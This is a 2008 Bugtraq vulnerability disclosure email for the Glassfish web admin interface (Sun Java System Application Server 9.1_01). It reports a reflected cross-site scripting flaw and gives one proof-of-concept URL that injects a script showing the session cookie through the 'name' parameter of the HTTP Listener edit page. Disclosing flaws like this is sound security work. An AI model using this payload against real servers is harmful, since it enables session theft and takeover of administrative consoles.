XSS - Glassfish Web Admin Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: XSS - Glassfish Web Admin Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )
- From: "Eduardo Jorge" <serrano.neves@xxxxxxxxx>
- Date: Tue, 10 Jun 2008 15:12:08 -0300
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to :subject:mime-version:content-type:content-transfer-encoding :content-disposition; bh=XW8SzU/74iuHFY/zn3VsMxH4cmAh3h4KSNKaJ4svPcY=; b=hqIQtNz2s6Z7b/3iz9ZBtVrJuLoK2PsbBGaUXEJQ2C1+skK+cKu3NGXUFpmXHRuXvM oCL/tEsk4lgBuYUR/lfEfeQeGN+J2qmee1fEirOd0Mt4SfPnJVCfQKHzTSiGQtuBzWVS e9tjJBsnNSMg2pIkjbMHzTV3D5U/fl89189xc=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type :content-transfer-encoding:content-disposition; b=nfi7hR+JYLFbSyjA8K1Ebdt4cKbHlWBdf4ZI43q8oZeehzgW8LgkRtbilyqOJWzaVm OKljIJROIajDfl6c8zkgwwV79iCHjefS2Uk/UykRtbylh84Agh58nxyWJk8Rs8uVvT9l uXlVNAwNFT1/mJY0agmezh3T7/SCMR29K9ihk=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
==============================
XSS - Glassfish Web Admin Interface (Sun Java System Application
Server 9.1_01 (build b09d-fcs) )
==============================
Author: Eduardo Neves a.k.a _eth0_
Date: 10 june 2008
Site: http://webappsecurity.wordpress.com
==============================
APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/
==============================
IMPACT: XSS, XSRF, etc.
Severity: Low (or not?)
==============================
Descrition:
This vulnerability was found in Edit HTTP Listener section in
Glassfish web admin interface.
This is a vulnerable URL:
http://[HOSTNAME]:4848/configuration/httpListenerEdit.jsf?name=<script>alert(document.cookie);</script>&configName=server-config
--
|_|0|_| Serrano Neves - a.k.a eth0
|_|_|0| http://webappsecurity.wordpress.com
|0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds